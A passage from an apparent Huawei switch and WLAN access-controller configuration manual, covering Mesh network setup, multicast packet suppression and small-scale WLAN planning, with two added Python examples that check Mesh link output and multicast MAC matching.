# Configure SwitchA. Add GE0/0/1 of SwitchA to management VLAN 100, set the PVID to
VLAN 100, and configure GE0/0/1 and GE0/0/2 to allow packets from VLAN 100 and
VLANs 102 to 106 to pass through.

NOTE

You are advised to configure port isolation on GE0/0/1 that connects SwitchA to AP1. If port isolation is not
configured, unnecessary packets are broadcast in the VLANs or WLAN users connected to different APs can
communicate with each other at Layer 2.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 102 to 106
[SwitchA] interface gigabitEthernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 102 to 106
[SwitchA-GigabitEthernet0/0/1] port-isolate enable //If the isolation group
is not specified for an interface, the interface is added to isolation group 1.
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitEthernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 102 to 106
[SwitchA-GigabitEthernet0/0/2] quit

# Set the NAC mode to unified mode on the AC (default setting). Configure GE1/0/1 to allow
packets from VLAN 100 and VLANs 102 to 106 to pass through.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 102 to 106
[AC] interface gigabitEthernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 102 to 106
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to assign IP addresses to STAs and APs.

[AC] dhcp enable
[AC] interface vlanif 102
[AC-Vlanif102] ip address 192.168.2.1 24
[AC-Vlanif102] dhcp select interface
[AC-Vlanif102] quit
[AC] interface vlanif 103
[AC-Vlanif103] ip address 192.168.3.1 24
[AC-Vlanif103] dhcp select interface
[AC-Vlanif103] quit
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit

Step 3 Configure AC system parameters.

# Configure the country code.


[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the
AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 4 Manage APs on the AC.

# Add the APs offline.


[AC-wlan-view] ap id 1 ap-type AP6010DN-AGN mac 0046-4b59-1ee0
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 ap-type AP6010DN-AGN mac 0046-4b59-1d20
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3 ap-type AP6010DN-AGN mac 0046-4b59-1d40
[AC-wlan-ap-3] quit

# Configure the Ethernet interface that connects AP1 (the MPP) to SwitchA to allow packets from
VLANs 102 to 106 to pass through.

NOTE
If MPP Ethernet interfaces are not configured to allow packets carrying service VLAN tags to pass through,
communication fails.
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] lineate-port gigabitethernet 0 vlan tagged 102 to 106
[AC-wlan-ap-1] quit

# Create AP regions 101, 102, and 103. An AC has a default AP region with the ID 0. AP
regions 101, 102, and 103 are used as an example here.
[AC-wlan-view] ap-region id 101
[AC-wlan-ap-region-101] quit
[AC-wlan-view] ap-region id 102
[AC-wlan-ap-region-102] quit
[AC-wlan-view] ap-region id 103
[AC-wlan-ap-region-103] quit

# Add AP1 to AP region 101, AP2 to AP region 102, and AP3 to AP region 103. By default,
an AP is added to region 0. This example adds the three APs to regions 101, 102, and 103
respectively.
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 101
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 102
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3
[AC-wlan-ap-3] region-id 103
[AC-wlan-ap-3] quit

Step 5 Configure Mesh parameters.

# Create a WMM profile named wp01 and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wp01 id 1
[AC-wlan-wmm-prof-wp01] quit

# Create a radio profile rp02, set the channel mode to fixed and retain the default settings for
other parameters, and bind the WMM profile wp01 to the radio profile. The default channel
mode is auto, but the fixed mode must be used in this example.
[AC-wlan-view] radio-profile name rp02 id 1
[AC-wlan-radio-prof-rp02] wmm-profile name wp01
[AC-wlan-radio-prof-rp02] channel-mode fixed //The APs along the mesh link
must use the same channel, so the fixed mode is used here.
[AC-wlan-radio-prof-rp02] quit

# Create a Mesh whitelist mesh01. By default, no Mesh whitelist is created. This example
uses Mesh whitelist mesh01 for the Mesh nodes.
[AC-wlan-view] mesh-whitelist name mesh01
[AC-wlan-mesh-whitelist-mesh01] peer ap mac 0046-4b59-1d20
[AC-wlan-mesh-whitelist-mesh01] peer ap mac 0046-4b59-1d40
[AC-wlan-mesh-whitelist-mesh01] peer ap mac 0046-4b59-1ee0 //Configure the
whitelists according to your needs. In this example, whitelists can be created
among three APs to ensure robustness of the mesh network, so the MAC addresses of
three APs are added to mesh01.
[AC-wlan-mesh-whitelist-mesh01] quit

# Create security profile sp01, set the security and authentication policy to WPA2-PSK, set
the authentication key to 12345678, and set the encryption mode to CCMP.
NOTE
On a WMN, the APs that connect to each other wirelessly support only security policy WPA2+PSK+CCMP.
[AC-wlan-view] security-profile name sp01
[AC-wlan-sec-prof-sp01] security-policy wpa2
[AC-wlan-sec-prof-sp01] wpa2 authentication-method psk pass-phrase cipher
12345678 encryption-method ccmp
[AC-wlan-sec-prof-sp01] quit

# Create a Mesh profile mesh01. Set the Mesh network ID to ChinaNet01, bind the security
profile sp01 to the Mesh profile, and retain the default settings of other parameters.
[AC-wlan-view] mesh-profile name mesh01
[AC-wlan-mesh-prof-mesh01] mesh-id ChinaNet01
[AC-wlan-mesh-prof-mesh01] security-profile name sp01
[AC-wlan-mesh-prof-mesh01] quit

Step 6 Configure a WLAN radio profile and WLAN-ESS interfaces.


# Create a radio profile rp01, retain the default settings in the profile, and bind it to the WMM
profile wp01.
[AC-wlan-view] radio-profile name rp01 id 0
[AC-wlan-radio-prof-rp01] wmm-profile name wp01
[AC-wlan-radio-prof-rp01] quit
[AC-wlan-view] quit

# Create WLAN-ESS interfaces.


[AC] interface wlan-ess 2
[AC-Wlan-Ess2] port trunk allow-pass vlan 102
[AC-Wlan-Ess2] quit
[AC] interface wlan-ess 3
[AC-Wlan-Ess3] port trunk allow-pass vlan 103
[AC-Wlan-Ess3] quit

Step 7 Configure a Mesh profile and service sets.


# Create a traffic profile named tp01 and retain the default settings in the profile.
[AC] wlan
[AC-wlan-view] traffic-profile name tp01
[AC-wlan-traffic-prof-tp01] quit

# Create and configure a service set ss02 and SSID ChinaSer02.


[AC-wlan-view] service-set name ss02
[AC-wlan-service-set-ss02] traffic-profile name tp01
[AC-wlan-service-set-ss02] security-profile name sp01
[AC-wlan-service-set-ss02] ssid ChinaSer02
[AC-wlan-service-set-ss02] service-vlan 102 //Set the VLAN ID of service set
to 102. By default, the VLAN ID of service set is 1.
[AC-wlan-service-set-ss02] wlan-ess 2
[AC-wlan-service-set-ss02] quit

# Create and configure a service set ss03 and SSID ChinaSer03.


[AC-wlan-view] service-set name ss03
[AC-wlan-service-set-ss03] traffic-profile name tp01
[AC-wlan-service-set-ss03] security-profile name sp01
[AC-wlan-service-set-ss03] ssid ChinaSer03
[AC-wlan-service-set-ss03] service-vlan 103 //Set the VLAN ID of service set
to 103. By default, the VLAN ID of service set is 1.
[AC-wlan-service-set-ss03] wlan-ess 3
[AC-wlan-service-set-ss03] quit

# Create a Mesh VAP on radio 1 of AP1 and set the role of radio 1 to MPP, and bind the Mesh
whitelist mesh01 and Mesh profile mesh01 to the radio.
[AC-wlan-view] ap 1 radio 1
[AC-wlan-radio-1/1] radio-profile name rp02
[AC-wlan-radio-1/1] mesh-role mesh-portal
[AC-wlan-radio-1/1] mesh-whitelist name mesh01
[AC-wlan-radio-1/1] mesh-profile name mesh01
[AC-wlan-radio-1/1] channel 40mhz-plus 157 //Radios setting up a Mesh link
must use the same channel and bandwidth. This example uses 40 MHz bandwidth and
channel 157.
[AC-wlan-radio-1/1] quit

# Create a Mesh VAP on radio 1 of AP2 and set the role of radio 1 to MP, and bind the Mesh
whitelist mesh01 and Mesh profile mesh01 to the radio. Create a service VAP on radio 0 of
AP2 and bind radio profile rp01 and service set ss02 to radio 0.
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name rp01
[AC-wlan-radio-2/0] service-set name ss02
[AC-wlan-radio-2/0] quit
[AC-wlan-view] ap 2 radio 1
[AC-wlan-radio-2/1] radio-profile name rp02
[AC-wlan-radio-2/1] mesh-role mesh-node
[AC-wlan-radio-2/1] mesh-whitelist name mesh01
[AC-wlan-radio-2/1] mesh-profile name mesh01
[AC-wlan-radio-2/1] channel 40mhz-plus 157
[AC-wlan-radio-2/1] quit

# Create a Mesh VAP on radio 1 of AP3 and set the role of radio 1 to MP, and bind the Mesh
whitelist mesh01 and Mesh profile mesh01 to the radio. Create a service VAP on radio 0 of
AP3 and bind radio profile rp01 and service set ss03 to radio 0.
[AC-wlan-view] ap 3 radio 0
[AC-wlan-radio-3/0] radio-profile name rp01
[AC-wlan-radio-3/0] service-set name ss03
[AC-wlan-radio-3/0] quit
[AC-wlan-view] ap 3 radio 1
[AC-wlan-radio-3/1] radio-profile name rp02
[AC-wlan-radio-3/1] mesh-role mesh-node
[AC-wlan-radio-3/1] mesh-whitelist name mesh01
[AC-wlan-radio-3/1] mesh-profile name mesh01
[AC-wlan-radio-3/1] channel 40mhz-plus 157
[AC-wlan-radio-3/1] quit

Step 8 Configure the AP wired interfaces.

# Set parameters for the AP3 wired interface.
[AC-wlan-view] ap id 3
[AC-wlan-ap-3] lineate-port gigabitethernet 0 vlan tagged 104 to 106 //Add
the wired interface of AP3 to VLANs 104 to 106 in tagged mode.
[AC-wlan-ap-3] lineate-port gigabitethernet 0 mode endpoint //Set the
downlink wired interface of AP3 to the endpoint mode.
[AC-wlan-ap-3] quit

NOTE

After changing the working mode of AP wired interfaces, reset the APs to make the configurations take
effect.

Step 9 Deliver parameters to APs.


# The AP parameters configured on the AC take effect only after they are delivered to the
APs.
[AC-wlan-view] commit ap 3
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y
[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y

# Run the display ap all command on the AC to check whether the status of APs is normal
and run the display mesh-link all command on the AC to check whether Mesh links have
been established. If the command output shows that APs are in normal state and displays
Mesh link information, APs have established Mesh links.
[AC-wlan-view] display ap all
All AP information:
Normal[3],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP    AP               AP                 Profile     AP        AP
ID    Type             MAC                /Region ID  State     Sysname
------------------------------------------------------------------------------
1     AP6010DN-AGN     0046-4b59-1ee0     0/101       normal    ap-1
2     AP6010DN-AGN     0046-4b59-1d20     0/102       normal    ap-2
3     AP6010DN-AGN     0046-4b59-1d40     0/103       normal    ap-3
------------------------------------------------------------------------------
Total number: 3
[AC-wlan-view] display mesh-link all
----------------------------------------------------------------------
AP ID  Radio ID  Mesh-link ID  WLAN ID  Peer AP ID  Mesh Role
----------------------------------------------------------------------
1      1         0             16       3           mesh-portal
1      1         1             16       2           mesh-portal
2      1         0             16       3           mesh-node
2      1         1             16       1           mesh-node
3      1         0             16       1           mesh-node
3      1         1             16       2           mesh-node
----------------------------------------------------------------------
Total: 6

----End
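The checks an operator runs on the Step 9 output, as an added Python example that is not part of this Huawei document: it parses display ap all and display mesh-link all (embedded below as constructed sample text in the layout shown above) and flags APs that are not normal, APs whose MAC is missing from the Mesh whitelist, one-sided Mesh links, and MPs with no path to the MPP. Function and variable names are the example's own.

```python
"""Checks on the Step 9 output: an added example, not part of the Huawei
document. Flags APs that are not normal, APs missing from the Mesh whitelist,
one-sided Mesh links and MPs with no path to an MPP. Inputs are constructed."""
import re
from collections import defaultdict

# Constructed sample output of 'display ap all' (three APs, all normal).
DISPLAY_AP_ALL = """\
------------------------------------------------------------------------------
AP    AP               AP                 Profile     AP        AP
ID    Type             MAC                /Region ID  State     Sysname
------------------------------------------------------------------------------
1     AP6010DN-AGN     0046-4b59-1ee0     0/101       normal    ap-1
2     AP6010DN-AGN     0046-4b59-1d20     0/102       normal    ap-2
3     AP6010DN-AGN     0046-4b59-1d40     0/103       normal    ap-3
------------------------------------------------------------------------------
Total number: 3
"""

# Constructed sample output of 'display mesh-link all' (AP1 is the MPP).
DISPLAY_MESH_LINK_ALL = """\
----------------------------------------------------------------------
AP ID  Radio ID  Mesh-link ID  WLAN ID  Peer AP ID  Mesh Role
----------------------------------------------------------------------
1      1         0             16       3           mesh-portal
1      1         1             16       2           mesh-portal
2      1         0             16       3           mesh-node
2      1         1             16       1           mesh-node
3      1         0             16       1           mesh-node
3      1         1             16       2           mesh-node
----------------------------------------------------------------------
Total: 6
"""

# Mesh whitelist mesh01 as planned in Table 15-35 and configured in Step 5.
MESH_WHITELIST = {"0046-4b59-1ee0", "0046-4b59-1d20", "0046-4b59-1d40"}

# Data rows only: header, separator and total lines do not match these.
AP_ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+([0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4})\s+(\S+)\s+(\S+)\s+(\S+)\s*$")
LINK_ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(mesh-portal|mesh-node)\s*$")


def parse_ap_all(text):
    """Return {ap_id: (mac, state)} from 'display ap all' output."""
    aps = {}
    for line in text.splitlines():
        m = AP_ROW.match(line)
        if m:
            aps[int(m.group(1))] = (m.group(3), m.group(5))
    return aps


def parse_mesh_links(text):
    """Return [(ap_id, peer_ap_id, mesh_role)] from 'display mesh-link all'."""
    links = []
    for line in text.splitlines():
        m = LINK_ROW.match(line)
        if m:
            links.append((int(m.group(1)), int(m.group(5)), m.group(6)))
    return links


def check_mesh(ap_text, link_text, whitelist):
    """Return a list of problems; an empty list means the WMN looks healthy."""
    aps = parse_ap_all(ap_text)
    links = parse_mesh_links(link_text)
    problems = []
    for ap_id, (mac, state) in aps.items():
        if state != "normal":
            problems.append(f"AP {ap_id} state is {state}")
        if mac not in whitelist:
            problems.append(f"AP {ap_id} MAC {mac} not in mesh whitelist")
    neighbours, roles = defaultdict(set), {}
    for ap_id, peer, role in links:
        neighbours[ap_id].add(peer)
        roles[ap_id] = role
        if peer not in aps:
            problems.append(f"AP {ap_id} has a link to unknown AP {peer}")
    # A healthy Mesh link is listed by both endpoints.
    for ap_id, peer, _ in links:
        if ap_id not in neighbours[peer]:
            problems.append(f"link {ap_id}->{peer} has no reverse entry")
    # Every MP must reach an MPP over Mesh links (breadth-first search).
    portals = {a for a, r in roles.items() if r == "mesh-portal"}
    if not portals:
        problems.append("no mesh-portal in the topology")
    reachable, frontier = set(portals), list(portals)
    while frontier:
        for nxt in neighbours[frontier.pop()]:
            if nxt not in reachable:
                reachable.add(nxt)
                frontier.append(nxt)
    problems += [f"AP {a} cannot reach an MPP" for a in aps if a not in reachable]
    return problems


if __name__ == "__main__":
    print(check_mesh(DISPLAY_AP_ALL, DISPLAY_MESH_LINK_ALL, MESH_WHITELIST) or "WMN OK")
```

A one-sided link or an MP with no path to the MPP is typically what you see when a peer MAC was left out of mesh01 or a Mesh radio was left on a channel other than 157.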

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 102 to 106
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 102 to 106
port-isolate enable group 1
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100 102 to 106
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 102 to 106
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
ip address 192.168.2.1 255.255.255.0
dhcp select interface
#
interface Vlanif103
ip address 192.168.3.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100 102 to 106
#
interface Wlan-Ess2
port trunk allow-pass vlan 102
#
interface Wlan-Ess3
port trunk allow-pass vlan 103
#
wlan
wlan ac source interface vlanif100
ap-region id 101
ap-region id 102
ap-region id 103
ap id 1 type-id 19 mac 0046-4b59-1ee0 sn 210235555310CC003587
region-id 101
lineate-port gigabitethernet 0 vlan tagged 102 to 106
ap id 2 type-id 19 mac 0046-4b59-1d20 sn 210235555310CC000094
region-id 102
ap id 3 type-id 19 mac 0046-4b59-1d40 sn 210235555310CC00AC69
region-id 103
lineate-port gigabitethernet 0 mode endpoint
lineate-port gigabitethernet 0 vlan tagged 104 to 106
wmm-profile name wp01 id 1
traffic-profile name tp01 id 0
security-profile name sp01 id 0
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@QGZ2"N.FU!8XFIGcV\{QFUWb%@%@ encryption-method ccmp
service-set name ss02 id 1
wlan-ess 2
ssid ChinaSer02
traffic-profile id 0
security-profile id 0
service-vlan 102
service-set name ss03 id 2
wlan-ess 3
ssid ChinaSer03
traffic-profile id 0
security-profile id 0
service-vlan 103
mesh-profile name mesh01 id 0
mesh-id ChinaNet01
security-profile id 0
radio-profile name rp01 id 0
wmm-profile id 1
radio-profile name rp02 id 1
channel-mode fixed
wmm-profile id 1
mesh-whitelist name mesh01 id 0
peer ap mac 0046-4b59-1ee0
peer ap mac 0046-4b59-1d20
peer ap mac 0046-4b59-1d40
ap 1 radio 1
radio-profile id 1
channel 40MHz-plus 157
mesh-role mesh-portal
mesh-whitelist id 0
mesh-profile id 0
ap 2 radio 0
radio-profile id 0
service-set id 1 wlan 1
ap 2 radio 1
radio-profile id 1
channel 40MHz-plus 157
mesh-whitelist id 0
mesh-profile id 0
ap 3 radio 0
radio-profile id 0
service-set id 2 wlan 1
ap 3 radio 1
radio-profile id 1
channel 40MHz-plus 157
mesh-whitelist id 0
mesh-profile id 0
#
return

16 Typical WLAN-AC Configuration (Applicable to Version V200R009)

About This Chapter

16.1 Common Misconfigurations
16.2 Example for Configuring WLAN Services on a Small-Scale Network
16.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks
16.4 Example for Configuring Unified Access for Wired and Wireless Users
16.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal Authentication)
16.6 Example for Configuring MAC Address Authentication on the Wireless Side
16.7 Example for Configuring Portal Authentication on the Wireless Side
16.8 Example for Configuring MAC Address-prioritized Portal Authentication
16.9 Configuring Radio Calibration
16.10 Configuring WLAN Roaming
16.11 Example for Configuring the WLAN Service Using WDS Technology
16.12 Example for Configuring the WLAN Service Using Mesh Technology

16.1 Common Misconfigurations

16.1.1 Multicast Packet Suppression Is Not Configured, and a Large Number of Low-Rate
Multicast Packets Affect the Wireless Network

Symptom
No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets, they
are usually sent at low rates. If a large number of such multicast packets are sent from the
network side, the air interfaces may be congested. You are advised to configure multicast
packet suppression to reduce impact of a large number of low-rate multicast packets on the
wireless network. Exercise caution when configuring the rate limit; otherwise, the multicast
services may be affected.
l In direct forwarding mode, you are advised to configure multicast packet suppression on
switch interfaces connected to APs.
l In tunnel forwarding mode, you are advised to configure multicast packet suppression on
WLAN-ESS interfaces of the AC.

Procedure
l Configure multicast packet suppression in direct forwarding mode.
a. Create the traffic classifier test and define a matching rule.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] traffic classifier test
[SwitchA-classifier-test] if-match destination-mac 0100-5e00-0000 mac-
address-mask ffff-ff00-0000 //Match the destination MAC address of
multicast packets.
[SwitchA-classifier-test] quit

b. Create the traffic behavior test, enable traffic statistics collection, and set the traffic
rate limit.
[SwitchA] traffic behavior test
[SwitchA-behavior-test] statistic enable
[SwitchA-behavior-test] car cir 100 //Set the rate limit to 100
kbit/s. If multicast services are available, you are advised to set the
rate limit according to the service traffic.
[SwitchA-behavior-test] quit

c. Create the traffic policy test and bind the traffic classifier and traffic behavior to the
traffic policy.
[SwitchA] traffic policy test
[SwitchA-trafficpolicy-test] classifier test behavior test
[SwitchA-trafficpolicy-test] quit

d. Apply the traffic policy to inbound or outbound directions of interfaces.


[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] traffic-policy test inbound
[SwitchA-GigabitEthernet0/0/1] traffic-policy test outbound
[SwitchA-GigabitEthernet0/0/1] quit

l Configure multicast packet suppression in tunnel forwarding mode.


a. Create the traffic profile test and set the maximum traffic volume of multicast
packets in the profile.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] wlan
[AC-wlan-view] traffic-profile name test
[AC-wlan-traffic-prof-test] traffic-optimize multicast-suppression
packets 100 //Set the maximum traffic volume of multicast packets to
100 pps. If multicast services are available, you are advised to set the
rate limit according to the service traffic.
[AC-wlan-traffic-prof-test] quit
b. Bind the traffic profile to the VAP profile.
[AC-wlan-view] vap-profile name test
[AC-wlan-vap-prof-test] traffic-profile test
[AC-wlan-vap-prof-test] quit

----End
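What the classifier in step a of the direct forwarding procedure actually selects, as an added Python example that is not part of this Huawei document: it applies the masked destination-MAC compare (0100-5e00-0000 with mask ffff-ff00-0000) to constructed sample frames and derives IPv4 multicast MACs with the RFC 1112 group-to-MAC mapping; the function names are the example's own.

```python
"""Added example (not from the Huawei document): what the classifier
'if-match destination-mac 0100-5e00-0000 mac-address-mask ffff-ff00-0000'
selects, evaluated against constructed sample frames."""

RULE_MAC = "0100-5e00-0000"   # destination-mac in the traffic classifier
RULE_MASK = "ffff-ff00-0000"  # mac-address-mask: only the first 24 bits count


def mac_to_int(mac):
    """Parse a MAC written as xxxx-xxxx-xxxx (Huawei style) or xx:xx:xx:xx:xx:xx."""
    digits = mac.replace("-", "").replace(":", "").lower()
    if len(digits) != 12 or any(c not in "0123456789abcdef" for c in digits):
        raise ValueError(f"bad MAC address: {mac}")
    return int(digits, 16)


def int_to_mac(value):
    """Format a 48-bit integer as Huawei-style xxxx-xxxx-xxxx."""
    h = f"{value:012x}"
    return f"{h[0:4]}-{h[4:8]}-{h[8:12]}"


def ipv4_group_to_mac(group):
    """RFC 1112 mapping: 01-00-5e followed by the low 23 bits of the group."""
    octets = [int(o) for o in group.split(".")]
    if len(octets) != 4 or not 224 <= octets[0] <= 239:
        raise ValueError(f"not an IPv4 multicast group: {group}")
    low23 = ((octets[1] & 0x7F) << 16) | (octets[2] << 8) | octets[3]
    return int_to_mac(0x01005E000000 | low23)


def mac_matches(mac, rule=RULE_MAC, mask=RULE_MASK):
    """Masked compare, as the switch evaluates it: (mac & mask) == (rule & mask)."""
    m = mac_to_int(mask)
    return (mac_to_int(mac) & m) == (mac_to_int(rule) & m)


def classify(frames):
    """Map each frame's destination MAC to whether the classifier (and so the CAR) applies."""
    return {dst: mac_matches(dst) for dst, _ in frames}


# Constructed sample frames as they might arrive on GE0/0/1 (not captured data).
SAMPLE_FRAMES = [
    (ipv4_group_to_mac("239.1.2.3"), "IPv4 multicast, e.g. an IPTV group"),
    (ipv4_group_to_mac("224.0.0.251"), "IPv4 multicast, mDNS"),
    ("0046-4b59-1d20", "unicast to an AP"),
    ("ffff-ffff-ffff", "broadcast"),
    ("3333-0000-0001", "IPv6 all-nodes multicast"),
]

if __name__ == "__main__":
    for dst, what in SAMPLE_FRAMES:
        print(f"{dst}  {what:34s}  limited by 'car cir 100': {mac_matches(dst)}")
```

Frames to IPv6 multicast MACs (3333-xxxx-xxxx) and broadcast frames fall outside this classifier, so a network that carries IPv6 multicast needs its own matching rule before the car limit applies to it.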

16.2 Example for Configuring WLAN Services on a Small-Scale Network

Small-Scale WLAN Overview

In this document, a Wireless Local Area Network (WLAN) uses 2.4 GHz or 5 GHz radio as the
transmission medium. Compared with wired networks, which are expensive, inflexible, fixed,
and lack mobility, WLANs are widely used because of their low cost, flexibility, scalability,
and mobility.
A small-scale WLAN can be a small campus network independently deployed for a small- or
medium-sized enterprise, or a branch network. A small-scale WLAN requires only a few
network devices to serve a small range of users.

Configuration Notes
l In this example, the security policy is WPA2-PSK-AES. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In the service data forwarding mode, the management VLAN and service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to
APs. If port isolation is not configured, many broadcast packets will be transmitted in the
VLANs or WLAN users on different APs can directly communicate at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-1 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
  V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
  V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
  V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
An enterprise has a small-scale branch network. The enterprise needs to deploy WLAN
services for mobile office so that its employees can access the enterprise internal network
anywhere and anytime.
As shown in Figure 16-1, the AC connects to APs through a PoE switch, and the PoE switch
provides power for APs. The WLAN service is configured on the AC, and delivered to APs.

Figure 16-1 Networking of a small-scale WLAN

(Figure not reproduced. It shows the AC uplinked to the Internet through GE1/0/2 in VLAN 101,
GE1/0/1 of the AC connected to GE0/0/2 of PoE SwitchA in VLAN 100, GE0/0/1 of SwitchA
connected to the AP in VLAN 100, and STAs associated with the AP.
Management VLAN: VLAN 100. Service VLAN: VLAN 101.)

Data Planning

Table 16-2 Data planning

Item: DHCP server
Data: The AC functions as a DHCP server to assign IP addresses to the STAs and AP.

Item: IP address pool for the AP
Data: 10.23.100.2-10.23.100.254/24

Item: IP address pool for STAs
Data: 10.23.101.2-10.23.101.254/24

Item: AC's source interface address
Data: VLANIF 100: 10.23.100.1/24

Item: AP group
Data:
  - Name: ap-group1
  - Referenced profile: VAP profile wlan-vap and regulatory domain profile domain1

Item: Regulatory domain profile
Data:
  - Name: domain1
  - Country code: CN

Item: SSID profile
Data:
  - Name: wlan-ssid
  - SSID name: wlan-net

Item: Security profile
Data:
  - Name: wlan-security
  - Security policy: WPA2+PSK+AES
  - Password: a1234567

Item: VAP profile
Data:
  - Name: wlan-vap
  - Forwarding mode: tunnel forwarding
  - Service VLAN: VLAN 101
  - Referenced profile: SSID profile wlan-ssid and security profile wlan-security

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the AP, AC, Switch, and upstream device to implement Layer 2
interconnection.
2. Configure the AC to function as a DHCP server to assign IP addresses to the STAs and
AP.
3. Configure the AP to go online.
a. Create an AP group and add the AP to the group. The APs that require the same
configuration can be added to the group for unified configuration.
b. Configure AC system parameters, including the country code and source interface
